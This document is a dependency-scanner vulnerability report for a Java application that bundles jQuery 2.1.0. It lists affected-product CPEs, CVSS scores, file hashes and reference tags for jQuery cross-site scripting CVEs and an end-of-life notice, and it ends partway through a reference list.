cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:* versions from (including) 18.1; versions up to (including) 20.1 cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\::*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.2.2 cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6.0.0; versions up to (including) 8.1.0.0.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:19.1.0-19.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:insurance_data_foundation:8.0.6-8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9 CVE-2020-11023 suppress
CISA Known Exploited Vulnerability: Product: JQuery JQuery Name: JQuery Cross-Site Scripting (XSS) Vulnerability Date Added: 2025-01-23 Description: JQuery contains a persistent cross-site scripting (XSS) vulnerability. When passing maliciously formed, untrusted input enclosed in HTML tags, JQuery's DOM manipulators can execute untrusted code in the context of the user's browser. Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Due Date: 2025-02-13 Notes: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; https://nvd.nist.gov/vuln/detail/CVE-2020-11023
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.0.3; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:* cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:cloud_insights_storage_workload_security_agent:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:hci_baseboard_management_controller:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 20.2 cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.1; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:health_sciences_inform:6.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hyperion_financial_reporting:11.1.2.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:* versions up to (excluding) 2.12.41 cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_resources:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:siebel_mobile:*:*:*:*:*:*:*:* versions up to (including) 20.12 cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9 jquery issue: 162 (RETIREJS) suppress
jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates Unscored:
References:
spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jar: jquery.min.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar/META-INF/resources/webjars/jquery/2.1.0/jquery.min.jsMD5: 1fe1caacda14275805e4c6fb15f2503bSHA1: 7e40e55d80a93539665009b9772829300701bb32SHA256: 8851e7844413ec986053d7d497ca932861b8622d2369bb291777329c2a713c72
Evidence Type Source Name Value Confidence Vendor file name jquery High Product file name jquery High Version file version 2.1.0 High
CVE-2015-9251 suppress
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - 